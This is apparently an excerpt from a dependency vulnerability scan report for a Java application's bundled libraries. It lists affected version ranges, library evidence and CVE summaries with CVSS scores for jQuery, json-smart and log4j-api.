af854a3a-2127-422b-91ae-364da2661108 - ISSUE_TRACKING,MAILING_LIST af854a3a-2127-422b-91ae-364da2661108 - ISSUE_TRACKING,MAILING_LIST af854a3a-2127-422b-91ae-364da2661108 - ISSUE_TRACKING,MAILING_LIST af854a3a-2127-422b-91ae-364da2661108 - ISSUE_TRACKING,MAILING_LIST af854a3a-2127-422b-91ae-364da2661108 - ISSUE_TRACKING,MAILING_LIST af854a3a-2127-422b-91ae-364da2661108 - ISSUE_TRACKING,MAILING_LIST af854a3a-2127-422b-91ae-364da2661108 - ISSUE_TRACKING,MAILING_LIST af854a3a-2127-422b-91ae-364da2661108 - MAILING_LIST,THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - MAILING_LIST,THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - MAILING_LIST,THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - MAILING_LIST,THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - MAILING_LIST,THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - MAILING_LIST,THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - MAILING_LIST,THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - PATCH,THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - PATCH,THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - PATCH,THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - PATCH,THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - PATCH,THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - RELEASE_NOTES,VENDOR_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - RELEASE_NOTES,VENDOR_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - THIRD_PARTY_ADVISORY info - https://blog.jquery.com/2020/04/10/jquery-3-5-0-released/ security-advisories@github.com - BROKEN_LINK security-advisories@github.com - BROKEN_LINK security-advisories@github.com - BROKEN_LINK,MAILING_LIST,THIRD_PARTY_ADVISORY security-advisories@github.com - EXPLOIT,THIRD_PARTY_ADVISORY,VDB_ENTRY security-advisories@github.com - ISSUE_TRACKING,MAILING_LIST security-advisories@github.com - ISSUE_TRACKING,MAILING_LIST security-advisories@github.com - ISSUE_TRACKING,MAILING_LIST security-advisories@github.com - ISSUE_TRACKING,MAILING_LIST security-advisories@github.com - ISSUE_TRACKING,MAILING_LIST security-advisories@github.com - ISSUE_TRACKING,MAILING_LIST security-advisories@github.com - ISSUE_TRACKING,MAILING_LIST security-advisories@github.com - ISSUE_TRACKING,MAILING_LIST security-advisories@github.com - ISSUE_TRACKING,MAILING_LIST security-advisories@github.com - ISSUE_TRACKING,MAILING_LIST security-advisories@github.com - ISSUE_TRACKING,MAILING_LIST security-advisories@github.com - ISSUE_TRACKING,MAILING_LIST security-advisories@github.com - ISSUE_TRACKING,MAILING_LIST security-advisories@github.com - ISSUE_TRACKING,MAILING_LIST security-advisories@github.com - ISSUE_TRACKING,MAILING_LIST security-advisories@github.com - ISSUE_TRACKING,MAILING_LIST security-advisories@github.com - ISSUE_TRACKING,MAILING_LIST security-advisories@github.com - ISSUE_TRACKING,MAILING_LIST security-advisories@github.com - ISSUE_TRACKING,MAILING_LIST security-advisories@github.com - ISSUE_TRACKING,MAILING_LIST security-advisories@github.com - ISSUE_TRACKING,MAILING_LIST security-advisories@github.com - ISSUE_TRACKING,MAILING_LIST security-advisories@github.com - ISSUE_TRACKING,MAILING_LIST security-advisories@github.com - ISSUE_TRACKING,MAILING_LIST security-advisories@github.com - ISSUE_TRACKING,MAILING_LIST security-advisories@github.com - ISSUE_TRACKING,MAILING_LIST security-advisories@github.com - ISSUE_TRACKING,MAILING_LIST security-advisories@github.com - ISSUE_TRACKING,MAILING_LIST security-advisories@github.com - ISSUE_TRACKING,MAILING_LIST security-advisories@github.com - ISSUE_TRACKING,MAILING_LIST security-advisories@github.com - ISSUE_TRACKING,MAILING_LIST security-advisories@github.com - ISSUE_TRACKING,MAILING_LIST security-advisories@github.com - ISSUE_TRACKING,MAILING_LIST security-advisories@github.com - ISSUE_TRACKING,MAILING_LIST security-advisories@github.com - ISSUE_TRACKING,MAILING_LIST security-advisories@github.com - ISSUE_TRACKING,MAILING_LIST security-advisories@github.com - ISSUE_TRACKING,MAILING_LIST security-advisories@github.com - MAILING_LIST,THIRD_PARTY_ADVISORY security-advisories@github.com - MAILING_LIST,THIRD_PARTY_ADVISORY security-advisories@github.com - MAILING_LIST,THIRD_PARTY_ADVISORY security-advisories@github.com - MAILING_LIST,THIRD_PARTY_ADVISORY security-advisories@github.com - MAILING_LIST,THIRD_PARTY_ADVISORY security-advisories@github.com - MAILING_LIST,THIRD_PARTY_ADVISORY security-advisories@github.com - MAILING_LIST,THIRD_PARTY_ADVISORY security-advisories@github.com - PATCH,THIRD_PARTY_ADVISORY security-advisories@github.com - PATCH,THIRD_PARTY_ADVISORY security-advisories@github.com - PATCH,THIRD_PARTY_ADVISORY security-advisories@github.com - PATCH,THIRD_PARTY_ADVISORY security-advisories@github.com - PATCH,THIRD_PARTY_ADVISORY security-advisories@github.com - RELEASE_NOTES,VENDOR_ADVISORY security-advisories@github.com - RELEASE_NOTES,VENDOR_ADVISORY security-advisories@github.com - THIRD_PARTY_ADVISORY security-advisories@github.com - THIRD_PARTY_ADVISORY security-advisories@github.com - THIRD_PARTY_ADVISORY security-advisories@github.com - THIRD_PARTY_ADVISORY security-advisories@github.com - THIRD_PARTY_ADVISORY security-advisories@github.com - THIRD_PARTY_ADVISORY security-advisories@github.com - THIRD_PARTY_ADVISORY security-advisories@github.com - THIRD_PARTY_ADVISORY security-advisories@github.com - THIRD_PARTY_ADVISORY security-advisories@github.com - THIRD_PARTY_ADVISORY Vulnerable Software & Versions (NVD):
cpe:2.3:a:drupal:drupal:*:*:*:*:*:*:*:* versions from (including) 7.0; versions up to (excluding) 7.70 cpe:2.3:a:drupal:drupal:*:*:*:*:*:*:*:* versions from (including) 8.7.0; versions up to (excluding) 8.7.14 cpe:2.3:a:drupal:drupal:*:*:*:*:*:*:*:* versions from (including) 8.8.0; versions up to (excluding) 8.8.6 cpe:2.3:a:jquery:jquery:*:*:*:*:*:*:*:* versions from (including) 1.0.3; versions up to (excluding) 3.5.0 cpe:2.3:a:netapp:active_iq_unified_manager:-:*:*:*:*:linux:*:* cpe:2.3:a:netapp:active_iq_unified_manager:-:*:*:*:*:vsphere:*:* cpe:2.3:a:netapp:active_iq_unified_manager:-:*:*:*:*:windows:*:* cpe:2.3:a:netapp:cloud_backup:-:*:*:*:*:*:*:* cpe:2.3:a:netapp:cloud_insights_storage_workload_security_agent:-:*:*:*:*:*:*:* cpe:2.3:a:netapp:hci_baseboard_management_controller:-:*:*:*:*:*:*:* cpe:2.3:a:netapp:max_data:-:*:*:*:*:*:*:* cpe:2.3:a:netapp:oncommand_insight:-:*:*:*:*:*:*:* cpe:2.3:a:netapp:oncommand_system_manager:*:*:*:*:*:*:*:* versions from (including) 3.0; versions up to (including) 3.1.3 cpe:2.3:a:netapp:snap_creator_framework:-:*:*:*:*:*:*:* cpe:2.3:a:netapp:snapcenter_server:-:*:*:*:*:*:*:* cpe:2.3:a:oracle:application_express:*:*:*:*:*:*:*:* versions up to (excluding) 20.2 cpe:2.3:a:oracle:application_testing_suite:13.3.0.1:*:*:*:*:*:*:* cpe:2.3:a:oracle:banking_enterprise_collections:*:*:*:*:*:*:*:* versions from (including) 2.7.0; versions up to (including) 2.8.0 cpe:2.3:a:oracle:banking_platform:*:*:*:*:*:*:*:* versions from (including) 2.4.0; versions up to (including) 2.10.0 cpe:2.3:a:oracle:blockchain_platform:*:*:*:*:*:*:*:* versions up to (excluding) 21.1.2 cpe:2.3:a:oracle:blockchain_platform:21.1.2:*:*:*:*:*:*:* cpe:2.3:a:oracle:business_intelligence:5.9.0.0.0:*:*:*:enterprise:*:*:* cpe:2.3:a:oracle:communications_analytics:12.1.1:*:*:*:*:*:*:* cpe:2.3:a:oracle:communications_eagle_application_processor:*:*:*:*:*:*:*:* versions from (including) 16.1.0; versions up to (including) 16.4.0 cpe:2.3:a:oracle:communications_element_manager:8.1.1:*:*:*:*:*:*:* cpe:2.3:a:oracle:communications_element_manager:8.2.0:*:*:*:*:*:*:* cpe:2.3:a:oracle:communications_element_manager:8.2.1:*:*:*:*:*:*:* cpe:2.3:a:oracle:communications_interactive_session_recorder:*:*:*:*:*:*:*:* versions from (including) 6.1; versions up to (including) 6.4 cpe:2.3:a:oracle:communications_operations_monitor:*:*:*:*:*:*:*:* versions from (including) 4.1; versions up to (including) 4.3 cpe:2.3:a:oracle:communications_operations_monitor:3.4:*:*:*:*:*:*:* cpe:2.3:a:oracle:communications_services_gatekeeper:7.0:*:*:*:*:*:*:* cpe:2.3:a:oracle:communications_session_report_manager:8.1.1:*:*:*:*:*:*:* cpe:2.3:a:oracle:communications_session_report_manager:8.2.0:*:*:*:*:*:*:* cpe:2.3:a:oracle:communications_session_report_manager:8.2.1:*:*:*:*:*:*:* cpe:2.3:a:oracle:communications_session_route_manager:8.1.1:*:*:*:*:*:*:* cpe:2.3:a:oracle:communications_session_route_manager:8.2.0:*:*:*:*:*:*:* cpe:2.3:a:oracle:communications_session_route_manager:8.2.1:*:*:*:*:*:*:* cpe:2.3:a:oracle:financial_services_regulatory_reporting_for_de_nederlandsche_bank:8.0.4:*:*:*:*:*:*:* cpe:2.3:a:oracle:financial_services_revenue_management_and_billing_analytics:2.7:*:*:*:*:*:*:* cpe:2.3:a:oracle:financial_services_revenue_management_and_billing_analytics:2.8:*:*:*:*:*:*:* cpe:2.3:a:oracle:health_sciences_inform:6.3.0:*:*:*:*:*:*:* cpe:2.3:a:oracle:healthcare_translational_research:3.2.1:*:*:*:*:*:*:* cpe:2.3:a:oracle:healthcare_translational_research:3.3.1:*:*:*:*:*:*:* cpe:2.3:a:oracle:healthcare_translational_research:3.3.2:*:*:*:*:*:*:* cpe:2.3:a:oracle:healthcare_translational_research:3.4.0:*:*:*:*:*:*:* cpe:2.3:a:oracle:hyperion_financial_reporting:11.1.2.4:*:*:*:*:*:*:* cpe:2.3:a:oracle:jd_edwards_enterpriseone_orchestrator:*:*:*:*:*:*:*:* versions up to (excluding) 9.2.5.0 cpe:2.3:a:oracle:jd_edwards_enterpriseone_tools:*:*:*:*:*:*:*:* versions up to (excluding) 9.2.5.0 cpe:2.3:a:oracle:oss_support_tools:*:*:*:*:*:*:*:* versions up to (excluding) 2.12.41 cpe:2.3:a:oracle:peoplesoft_enterprise_human_capital_management_resources:9.2:*:*:*:*:*:*:* cpe:2.3:a:oracle:primavera_gateway:*:*:*:*:*:*:*:* versions from (including) 16.2; versions up to (including) 16.2.11 cpe:2.3:a:oracle:primavera_gateway:*:*:*:*:*:*:*:* versions from (including) 17.12.0; versions up to (including) 17.12.7 cpe:2.3:a:oracle:primavera_gateway:*:*:*:*:*:*:*:* versions from (including) 18.8.0; versions up to (including) 18.8.9 cpe:2.3:a:oracle:primavera_gateway:*:*:*:*:*:*:*:* versions from (including) 19.12.0; versions up to (including) 19.12.4 cpe:2.3:a:oracle:rest_data_services:11.2.0.4:*:*:*:-:*:*:* cpe:2.3:a:oracle:rest_data_services:12.1.0.2:*:*:*:-:*:*:* cpe:2.3:a:oracle:rest_data_services:12.2.0.1:*:*:*:-:*:*:* cpe:2.3:a:oracle:rest_data_services:18c:*:*:*:-:*:*:* cpe:2.3:a:oracle:rest_data_services:19c:*:*:*:-:*:*:* cpe:2.3:a:oracle:siebel_mobile:*:*:*:*:*:*:*:* versions up to (including) 20.12 cpe:2.3:a:oracle:storagetek_acsls:8.5.1:*:*:*:*:*:*:* cpe:2.3:a:oracle:storagetek_tape_analytics_sw_tool:2.3.1:*:*:*:*:*:*:* cpe:2.3:a:oracle:webcenter_sites:12.2.1.3.0:*:*:*:*:*:*:* cpe:2.3:a:oracle:webcenter_sites:12.2.1.4.0:*:*:*:*:*:*:* cpe:2.3:a:oracle:weblogic_server:12.1.3.0.0:*:*:*:*:*:*:* cpe:2.3:a:oracle:weblogic_server:12.2.1.3.0:*:*:*:*:*:*:* cpe:2.3:a:oracle:weblogic_server:12.2.1.4.0:*:*:*:*:*:*:* cpe:2.3:a:oracle:weblogic_server:14.1.1.0.0:*:*:*:*:*:*:* cpe:2.3:a:tenable:log_correlation_engine:*:*:*:*:*:*:*:* versions up to (excluding) 6.0.9 jquery issue: 162 (RETIREJS) suppress
jQuery 1.x and 2.x are End-of-Life and no longer receiving security updates Unscored:
References:
spring-music-sqldb-1.0.jar: jquery-2.1.0-2.jar: webjars-requirejs.jsFile Path: /github/workspace/build/libs/spring-music-sqldb-1.0.jar/BOOT-INF/lib/jquery-2.1.0-2.jar/META-INF/resources/webjars/jquery/2.1.0/webjars-requirejs.jsMD5: 30e1a7f167b667001f50e32ea87bf7b5SHA1: d18dc733350ad3549af2df096599e824c10f777eSHA256: daca7b23bc4d8302a8961373b92b78d36d5c85d730fc14130e29d55d976aa420
Evidence Type Source Name Value Confidence
spring-music-sqldb-1.0.jar: json-smart-1.3.1.jarDescription:
JSON (JavaScript Object Notation) is a lightweight data-interchange format.
It is easy for humans to read and write. It is easy for machines to parse and generate.
It is based on a subset of the JavaScript Programming Language, Standard ECMA-262 3rd Edition
- December 1999. JSON is a text format that is completely language independent but uses
conventions that are familiar to programmers of the C-family of languages, including C, C++, C#,
Java, JavaScript, Perl, Python, and many others.
These properties make JSON an ideal data-interchange language.
License:
http://www.apache.org/licenses/LICENSE-2.0.txt File Path: /github/workspace/build/libs/spring-music-sqldb-1.0.jar/BOOT-INF/lib/json-smart-1.3.1.jar
MD5: b4f09b247c03cc2d091502d5b1db1f7f
SHA1: 69b3835e96d282ec85fc2e1517b8164c45ed639e
SHA256: ac3689112788e042088755e63ecd1f689adfeb04d7fb1cfd244513f94f82522c
Evidence Type Source Name Value Confidence Vendor file name json-smart High Vendor jar package name json Highest Vendor jar package name minidev Highest Vendor jar package name net Highest Vendor jar package name parser Highest Vendor Manifest bundle-docurl http://www.minidev.net/ Low Vendor Manifest bundle-symbolicname net.minidev.json-smart Medium Vendor pom artifactid json-smart Low Vendor pom groupid net.minidev Highest Vendor pom name JSON Small and Fast Parser High Vendor pom parent-artifactid parent Low Product file name json-smart High Product jar package name json Highest Product jar package name minidev Highest Product jar package name net Highest Product jar package name parser Highest Product Manifest bundle-docurl http://www.minidev.net/ Low Product Manifest Bundle-Name json-smart Medium Product Manifest bundle-symbolicname net.minidev.json-smart Medium Product pom artifactid json-smart Highest Product pom groupid net.minidev Highest Product pom name JSON Small and Fast Parser High Product pom parent-artifactid parent Medium Version file version 1.3.1 High Version Manifest Bundle-Version 1.3.1 High Version pom version 1.3.1 Highest
CVE-2021-31684 suppress
A vulnerability was discovered in the indexOf function of JSONParserByteArray in JSON Smart versions 1.3 and 2.4 which causes a denial of service (DOS) via a crafted web request. CWE-787 Out-of-bounds Write
CVSSv3:
Base Score: HIGH (7.5) Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H/E:3.9/RC:R/MAV:A CVSSv2:
Base Score: MEDIUM (5.0) Vector: /AV:N/AC:L/Au:N/C:N/I:N/A:P References:
OSSINDEX - [CVE-2021-31684] CWE-787: Out-of-bounds Write OSSIndex - http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2021-31684 OSSIndex - https://github.com/netplex/json-smart-v1/issues/10 OSSIndex - https://github.com/netplex/json-smart-v1/pull/11 OSSIndex - https://github.com/netplex/json-smart-v2/issues/67 OSSIndex - https://github.com/netplex/json-smart-v2/pull/68 af854a3a-2127-422b-91ae-364da2661108 - EXPLOIT,ISSUE_TRACKING,THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - ISSUE_TRACKING,THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - PATCH,THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - PATCH,THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - PATCH,THIRD_PARTY_ADVISORY cve@mitre.org - EXPLOIT,ISSUE_TRACKING,THIRD_PARTY_ADVISORY cve@mitre.org - ISSUE_TRACKING,THIRD_PARTY_ADVISORY cve@mitre.org - PATCH,THIRD_PARTY_ADVISORY cve@mitre.org - PATCH,THIRD_PARTY_ADVISORY cve@mitre.org - PATCH,THIRD_PARTY_ADVISORY Vulnerable Software & Versions: (show all )
CVE-2023-1370 suppress
[Json-smart](https://netplex.github.io/json-smart/) is a performance focused, JSON processor lib.
When reaching a ‘[‘ or ‘{‘ character in the JSON input, the code parses an array or an object respectively.
It was discovered that the code does not have any limit to the nesting of such arrays or objects. Since the parsing of nested arrays and objects is done recursively, nesting too many of them can cause a stack exhaustion (stack overflow) and crash the software. CWE-674 Uncontrolled Recursion
CVSSv3:
Base Score: HIGH (7.5) Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H/E:3.9/RC:R/MAV:A References:
Vulnerable Software & Versions:
CVE-2021-27568 suppress
An issue was discovered in netplex json-smart-v1 through 2015-10-23 and json-smart-v2 through 2.4. An exception is thrown from a function, but it is not caught, as demonstrated by NumberFormatException. When it is not caught, it may cause programs using the library to crash or expose sensitive information. CWE-754 Improper Check for Unusual or Exceptional Conditions
CVSSv3:
Base Score: MEDIUM (5.9) Vector: CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:N/A:H/E:2.2/RC:R/MAV:A CVSSv2:
Base Score: MEDIUM (4.3) Vector: /AV:N/AC:M/Au:N/C:N/I:N/A:P References:
OSSINDEX - [CVE-2021-27568] CWE-754: Improper Check for Unusual or Exceptional Conditions OSSIndex - http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2021-27568 OSSIndex - https://github.com/netplex/json-smart-v1/issues/7 OSSIndex - https://github.com/netplex/json-smart-v1/pull/8 OSSIndex - https://github.com/netplex/json-smart-v2/issues/60 OSSIndex - https://github.com/netplex/json-smart-v2/pull/61 af854a3a-2127-422b-91ae-364da2661108 - EXPLOIT,THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - EXPLOIT,THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - PATCH,THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - PATCH,THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - PATCH,THIRD_PARTY_ADVISORY cve@mitre.org - EXPLOIT,THIRD_PARTY_ADVISORY cve@mitre.org - EXPLOIT,THIRD_PARTY_ADVISORY cve@mitre.org - PATCH,THIRD_PARTY_ADVISORY cve@mitre.org - PATCH,THIRD_PARTY_ADVISORY cve@mitre.org - PATCH,THIRD_PARTY_ADVISORY Vulnerable Software & Versions: (show all )
spring-music-sqldb-1.0.jar: jul-to-slf4j-1.7.25.jarDescription:
JUL to SLF4J bridge File Path: /github/workspace/build/libs/spring-music-sqldb-1.0.jar/BOOT-INF/lib/jul-to-slf4j-1.7.25.jarMD5: ab28124cb05fec600f2ffe37b94629e0SHA1: 0af5364cd6679bfffb114f0dec8a157aaa283b76SHA256: 416c5a0c145ad19526e108d44b6bf77b75412d47982cce6ce8d43abdbdbb0fac
Evidence Type Source Name Value Confidence Vendor file name jul-to-slf4j High Vendor jar package name bridge Highest Vendor jar package name slf4j Highest Vendor Manifest bundle-requiredexecutionenvironment J2SE-1.5 Low Vendor Manifest bundle-symbolicname jul.to.slf4j Medium Vendor pom artifactid jul-to-slf4j Low Vendor pom groupid org.slf4j Highest Vendor pom name JUL to SLF4J bridge High Vendor pom parent-artifactid slf4j-parent Low Vendor pom url http://www.slf4j.org Highest Product file name jul-to-slf4j High Product jar package name bridge Highest Product jar package name slf4j Highest Product Manifest Bundle-Name jul-to-slf4j Medium Product Manifest bundle-requiredexecutionenvironment J2SE-1.5 Low Product Manifest bundle-symbolicname jul.to.slf4j Medium Product pom artifactid jul-to-slf4j Highest Product pom groupid org.slf4j Highest Product pom name JUL to SLF4J bridge High Product pom parent-artifactid slf4j-parent Medium Product pom url http://www.slf4j.org Medium Version file version 1.7.25 High Version Manifest Bundle-Version 1.7.25 High Version Manifest Implementation-Version 1.7.25 High Version pom version 1.7.25 Highest
spring-music-sqldb-1.0.jar: lang-tag-1.7.jarDescription:
Java implementation of "Tags for Identifying Languages" (RFC 5646) License:
The Apache Software License, Version 2.0: https://www.apache.org/licenses/LICENSE-2.0.txt File Path: /github/workspace/build/libs/spring-music-sqldb-1.0.jar/BOOT-INF/lib/lang-tag-1.7.jar
MD5: 31b8a4f76fdbf21f1d667f9d6618e0b2
SHA1: 97c73ecd70bc7e8eefb26c5eea84f251a63f1031
SHA256: e8c1c594e2425bdbea2d860de55c69b69fc5d59454452449a0f0913c2a5b8a31
Evidence Type Source Name Value Confidence Vendor file name lang-tag High Vendor jar package name langtag Highest Vendor jar package name nimbusds Highest Vendor Manifest build-date ${timestamp} Low Vendor Manifest build-jdk-spec 11 Low Vendor Manifest build-number ${buildNumber} Low Vendor Manifest build-tag 1.7 Low Vendor Manifest bundle-docurl https://connect2id.com/ Low Vendor Manifest bundle-symbolicname lang-tag Medium Vendor Manifest Implementation-Vendor Connect2id Ltd. High Vendor Manifest Implementation-Vendor-Id com.nimbusds Medium Vendor Manifest specification-vendor Connect2id Ltd. Low Vendor pom artifactid lang-tag Low Vendor pom developer email vladimir@dzhuvinov.com Low Vendor pom developer id vdzhuvinov Medium Vendor pom developer name Vladimir Dzhuvinov Medium Vendor pom groupid com.nimbusds Highest Vendor pom name Nimbus LangTag High Vendor pom organization name Connect2id Ltd. High Vendor pom organization url https://connect2id.com/ Medium Vendor pom url https://bitbucket.org/connect2id/nimbus-language-tags Highest Product file name lang-tag High Product jar package name langtag Highest Product jar package name nimbusds Highest Product Manifest build-date ${timestamp} Low Product Manifest build-jdk-spec 11 Low Product Manifest build-number ${buildNumber} Low Product Manifest build-tag 1.7 Low Product Manifest bundle-docurl https://connect2id.com/ Low Product Manifest Bundle-Name Nimbus LangTag Medium Product Manifest bundle-symbolicname lang-tag Medium Product Manifest Implementation-Title Nimbus LangTag High Product Manifest specification-title Nimbus LangTag Medium Product pom artifactid lang-tag Highest Product pom developer email vladimir@dzhuvinov.com Low Product pom developer id vdzhuvinov Low Product pom developer name Vladimir Dzhuvinov Low Product pom groupid com.nimbusds Highest Product pom name Nimbus LangTag High Product pom organization name Connect2id Ltd. Low Product pom organization url https://connect2id.com/ Low Product pom url https://bitbucket.org/connect2id/nimbus-language-tags Medium Version file version 1.7 High Version Manifest build-tag 1.7 Low Version Manifest Implementation-Version 1.7 High Version pom version 1.7 Highest
spring-music-sqldb-1.0.jar: lettuce-core-5.0.3.RELEASE.jarDescription:
Advanced and thread-safe Java Redis client for synchronous, asynchronous, and
reactive usage. Supports Cluster, Sentinel, Pipelining, Auto-Reconnect, Codecs
and much more.
License:
Apache License, Version 2.0: http://www.apache.org/licenses/LICENSE-2.0.txt File Path: /github/workspace/build/libs/spring-music-sqldb-1.0.jar/BOOT-INF/lib/lettuce-core-5.0.3.RELEASE.jar
MD5: 13eaad4169405dc6fb621378f3655385
SHA1: a888355a2c69ba7329ee542e1cc4cc5b90da1723
SHA256: 08cbd74d328d82e7857c6915742f0a9263b3b1b5385bf7658fce94c0b2a18de3
Evidence Type Source Name Value Confidence Vendor file name lettuce-core High Vendor jar package name cluster Highest Vendor jar package name core Highest Vendor jar package name core Low Vendor jar package name io Highest Vendor jar package name io Low Vendor jar package name lettuce Highest Vendor jar package name lettuce Low Vendor jar package name sentinel Highest Vendor pom artifactid lettuce-core Low Vendor pom developer id mp911de Medium Vendor pom developer id will Medium Vendor pom developer name Mark Paluch Medium Vendor pom developer name Will Glozer Medium Vendor pom groupid io.lettuce Highest Vendor pom name Lettuce High Vendor pom organization name lettuce.io High Vendor pom organization url https://lettuce.io Medium Vendor pom url http://github.com/lettuce-io/lettuce-core Highest Product file name lettuce-core High Product jar package name cluster Highest Product jar package name core Highest Product jar package name core Low Product jar package name io Highest Product jar package name lettuce Highest Product jar package name lettuce Low Product jar package name sentinel Highest Product pom artifactid lettuce-core Highest Product pom developer id mp911de Low Product pom developer id will Low Product pom developer name Mark Paluch Low Product pom developer name Will Glozer Low Product pom groupid io.lettuce Highest Product pom name Lettuce High Product pom organization name lettuce.io Low Product pom organization url https://lettuce.io Low Product pom url http://github.com/lettuce-io/lettuce-core Medium Version pom version 5.0.3.RELEASE Highest
spring-music-sqldb-1.0.jar: log4j-api-2.10.0.jarDescription:
The Apache Log4j API License:
https://www.apache.org/licenses/LICENSE-2.0.txt File Path: /github/workspace/build/libs/spring-music-sqldb-1.0.jar/BOOT-INF/lib/log4j-api-2.10.0.jar
MD5: b15b1def49daaf7e74fffcce9442ba98
SHA1: fec5797a55b786184a537abd39c3fa1449d752d6
SHA256: 26af661e5c37cfe233cdec402e8a5c0bd112e03d3b6cf12b0d9db7ee7f6fbdd9
Evidence Type Source Name Value Confidence Vendor file name log4j-api High Vendor jar package name apache Highest Vendor jar package name log4j Highest Vendor jar package name logging Highest Vendor jar package name org Highest Vendor Manifest automatic-module-name Medium Vendor Manifest bundle-docurl https://www.apache.org/ Low Vendor Manifest bundle-symbolicname org.apache.logging.log4j.api Medium Vendor Manifest implementation-url https://logging.apache.org/log4j/2.x/log4j-api/ Low Vendor Manifest Implementation-Vendor The Apache Software Foundation High Vendor Manifest Implementation-Vendor-Id org.apache Medium Vendor Manifest log4jreleasekey B3D8E1BA Low Vendor Manifest log4jreleasemanager Ralph Goers Low Vendor Manifest multi-release true Low Vendor Manifest specification-vendor The Apache Software Foundation Low Vendor pom artifactid log4j-api Low Vendor pom groupid org.apache.logging.log4j Highest Vendor pom name Apache Log4j API High Vendor pom parent-artifactid log4j Low Product file name log4j-api High Product jar package name apache Highest Product jar package name log4j Highest Product jar package name logging Highest Product jar package name org Highest Product Manifest automatic-module-name Medium Product Manifest bundle-docurl https://www.apache.org/ Low Product Manifest Bundle-Name Apache Log4j API Medium Product Manifest bundle-symbolicname org.apache.logging.log4j.api Medium Product Manifest Implementation-Title Apache Log4j API High Product Manifest implementation-url https://logging.apache.org/log4j/2.x/log4j-api/ Low Product Manifest log4jreleasekey B3D8E1BA Low Product Manifest log4jreleasemanager Ralph Goers Low Product Manifest multi-release true Low Product Manifest specification-title Apache Log4j API Medium Product pom artifactid log4j-api Highest Product pom groupid org.apache.logging.log4j Highest Product pom name Apache Log4j API High Product pom parent-artifactid log4j Medium Version file version 2.10.0 High Version Manifest Bundle-Version 2.10.0 High Version Manifest Implementation-Version 2.10.0 High Version Manifest log4jreleaseversion 2.10.0 Medium Version pom version 2.10.0 Highest
CVE-2020-9488 suppress
Improper validation of certificate with host mismatch in Apache Log4j SMTP appender. This could allow an SMTPS connection to be intercepted by a man-in-the-middle attack which could leak any log messages sent through that appender. Fixed in Apache Log4j 2.12.3 and 2.13.1 CWE-295 Improper Certificate Validation
CVSSv3:
Base Score: LOW (3.7) Vector: CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:L/I:N/A:N/E:2.2/RC:R/MAV:A CVSSv2:
Base Score: MEDIUM (4.3) Vector: /AV:N/AC:M/Au:N/C:P/I:N/A:N References:
af854a3a-2127-422b-91ae-364da2661108 - ISSUE_TRACKING,MITIGATION,PATCH,VENDOR_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - MAILING_LIST,THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - PATCH,THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - PATCH,THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - PATCH,THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - THIRD_PARTY_ADVISORY af854a3a-2127-422b-91ae-364da2661108 - THIRD_PARTY_ADVISORY security@apache.org - ISSUE_TRACKING,MITIGATION,PATCH,VENDOR_ADVISORY security@apache.org - MAILING_LIST,THIRD_PARTY_ADVISORY security@apache.org - PATCH,THIRD_PARTY_ADVISORY security@apache.org - PATCH,THIRD_PARTY_ADVISORY security@apache.org - PATCH,THIRD_PARTY_ADVISORY security@apache.org - THIRD_PARTY_ADVISORY security@apache.org - THIRD_PARTY_ADVISORY security@apache.org - THIRD_PARTY_ADVISORY security@apache.org - THIRD_PARTY_ADVISORY security@apache.org - THIRD_PARTY_ADVISORY Vulnerable Software & Versions: (show all )
